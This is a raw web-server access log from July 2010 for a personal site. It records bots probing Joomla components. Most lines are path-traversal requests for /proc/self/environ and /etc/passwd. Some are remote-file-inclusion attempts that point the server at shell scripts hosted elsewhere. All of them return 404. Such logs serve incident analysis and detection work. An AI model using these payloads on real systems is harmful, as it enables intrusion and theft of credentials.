217.73.227.30 - - [30/Jul/2010:09:35:30 -0700] "GET /index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
217.73.227.30 - - [30/Jul/2010:09:35:31 -0700] "GET /logs//index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
200.46.235.146 - - [30/Jul/2010:09:36:44 -0700] "GET /logs/access_100625.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.smpn1jatiluhur.sch.id/cmd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
188.165.213.8 - - [30/Jul/2010:09:37:20 -0700] "GET /logs/access_100615.log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.213.8 - - [30/Jul/2010:09:37:20 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
188.165.213.8 - - [30/Jul/2010:09:37:20 -0700] "GET /logs///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
200.46.235.146 - - [30/Jul/2010:09:37:33 -0700] "GET /logs/access_100615.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.smpn1jatiluhur.sch.id/cmd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
200.46.235.146 - - [30/Jul/2010:09:37:33 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.smpn1jatiluhur.sch.id/cmd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
200.46.235.146 - - [30/Jul/2010:09:37:34 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.smpn1jatiluhur.sch.id/cmd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
121.78.118.123 - - [30/Jul/2010:09:39:40 -0700] "GET /logs/access_100627.log////index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
121.78.118.123 - - [30/Jul/2010:09:39:41 -0700] "GET ///index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
121.78.118.123 - - [30/Jul/2010:09:39:41 -0700] "GET /logs////index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
121.78.118.123 - - [30/Jul/2010:09:39:52 -0700] "GET /logs/access_100627.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
121.78.118.123 - - [30/Jul/2010:09:39:52 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
121.78.118.123 - - [30/Jul/2010:09:39:53 -0700] "GET /logs////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:09:40:15 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:09:40:21 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:09:40:33 -0700] "GET /rwcards.advancedate.php?mosConfig_absolute_path=http://www.africamissionsna.org//sc/as.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:09:40:33 -0700] "GET /logs//rwcards.advancedate.php?mosConfig_absolute_path=http://www.africamissionsna.org//sc/as.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:09:40:35 -0700] "GET /logs/access_100614.log%20%20//rwcards.advancedate.php?mosConfig_absolute_path=http://www.africamissionsna.org//sc/as.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:41:58 -0700] "GET /logs/access_100616.log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:42:03 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:09:42:32 -0700] "GET /logs/access_100705.log////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:09:42:33 -0700] "GET ///index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:09:42:33 -0700] "GET /logs////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
200.46.235.146 - - [30/Jul/2010:09:42:35 -0700] "GET /logs/access_100614.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.smpn1jatiluhur.sch.id/cmd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:43:08 -0700] "GET /logs/access_100616.log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:43:15 -0700] "GET /logs/access_100623.log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:43:20 -0700] "GET /logs/access_100615.log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:43:22 -0700] "GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:43:22 -0700] "GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:43:22 -0700] "GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:43:22 -0700] "GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:43:22 -0700] "GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:43:24 -0700] "GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:43:24 -0700] "GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:43:25 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:43:26 -0700] "GET /logs///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:09:43:33 -0700] "GET /rwcards.advancedate.php?mosConfig_absolute_path=http://www.africamissionsna.org//sc/as.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:43:34 -0700] "GET /logs/access.log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:09:43:35 -0700] "GET /logs//rwcards.advancedate.php?mosConfig_absolute_path=http://www.africamissionsna.org//sc/as.txt??????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:09:43:37 -0700] "GET /logs/access_100614.log%20%20//rwcards.advancedate.php?mosConfig_absolute_path=http://www.africamissionsna.org//sc/as.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:43:37 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:09:43:54 -0700] "GET ///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:09:44:46 -0700] "GET /logs/access_100705.log////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:09:44:47 -0700] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:09:44:47 -0700] "GET /logs////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:09:45:25 -0700] "GET /logs/access_100616.log%20%20//rwcards.advancedate.php?mosConfig_absolute_path=http://www.africamissionsna.org//sc/as.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:09:45:45 -0700] "GET /logs/access_100629.log////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
121.78.118.123 - - [30/Jul/2010:09:45:47 -0700] "GET ///index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:46:26 -0700] "GET /logs/access_100616.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:46:27 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:46:28 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:46:29 -0700] "GET /logs/access_100614.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
121.78.118.123 - - [30/Jul/2010:09:46:42 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
77.88.28.247 - - [30/Jul/2010:09:48:12 -0700] "GET /logs/access.log HTTP/1.1" 200 41404 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:09:48:13 -0700] "GET /logs/access_100629.log////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:09:48:50 -0700] "GET /logs/access_100616.log%20%20//rwcards.advancedate.php?mosConfig_absolute_path=http://www.africamissionsna.org//sc/as.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:49:15 -0700] "GET /logs/access_100627.log/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:49:15 -0700] "GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:49:16 -0700] "GET /logs/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
74.50.20.76 - - [30/Jul/2010:09:49:19 -0700] "GET /*.?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
74.50.20.76 - - [30/Jul/2010:09:49:19 -0700] "GET /*.?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
74.50.20.76 - - [30/Jul/2010:09:49:50 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:49:56 -0700] "GET /logs/access_100627.log/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:49:56 -0700] "GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:50:00 -0700] "GET /logs/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
74.50.20.76 - - [30/Jul/2010:09:50:02 -0700] "GET /logs/access_100615.log/*.?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
74.50.20.76 - - [30/Jul/2010:09:50:02 -0700] "GET /*.?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
74.50.20.76 - - [30/Jul/2010:09:50:03 -0700] "GET /logs/*.?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
74.50.20.76 - - [30/Jul/2010:09:50:04 -0700] "GET /logs/access_100615.log/*.?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
74.50.20.76 - - [30/Jul/2010:09:50:04 -0700] "GET /*.?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
74.50.20.76 - - [30/Jul/2010:09:50:04 -0700] "GET /logs/*.?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:50:12 -0700] "GET /logs/access_100627.log/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:50:12 -0700] "GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:50:13 -0700] "GET /logs/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
208.80.194.39 - - [30/Jul/2010:09:50:44 -0700] "GET / HTTP/1.0" 200 908 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; SpamBlockerUtility 4.7.5)" "www.brianwinterman.com"
74.50.20.76 - - [30/Jul/2010:09:51:59 -0700] "GET /logs/access_100627.log/*.?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
74.50.20.76 - - [30/Jul/2010:09:52:00 -0700] "GET /logs/access_100627.log/*.?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:52:04 -0700] "GET /logs/access_100616.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:52:04 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:52:05 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:53:27 -0700] "GET /logs/access_100627.log/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:53:27 -0700] "GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:53:28 -0700] "GET /logs/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:53:30 -0700] "GET /logs/access_100627.log/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:53:31 -0700] "GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:53:31 -0700] "GET /logs/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:53:32 -0700] "GET /logs/access_100627.log/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:53:32 -0700] "GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:53:33 -0700] "GET /logs/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:53:48 -0700] "GET /logs/access_100627.log/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
